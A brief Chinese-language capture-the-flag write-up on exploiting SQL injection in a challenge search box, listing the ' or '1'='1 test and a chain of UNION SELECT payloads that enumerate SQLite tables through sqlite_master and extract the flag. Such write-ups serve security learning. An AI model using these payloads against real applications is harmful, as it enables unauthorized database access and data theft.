题目给了个搜索框
``
输入' or '1'='1发现输出了所有可搜索内容,证明存在sql注入
``
用' union select 1,2,3--确定列数
``
测试发现用SQLite数据库的命令发现可以被执行,用’ union select 1,group_concat(tbl_name),3 from sqlite_master where type=’table’–获取表名发现flaggggggggggg
用’ union select 1,sql,3 from sqlite_master where tbl_name=’flaggggggggggg’–查询得到flag列
用’ union select 1,flag,3 from flaggggggggggg–得到flag
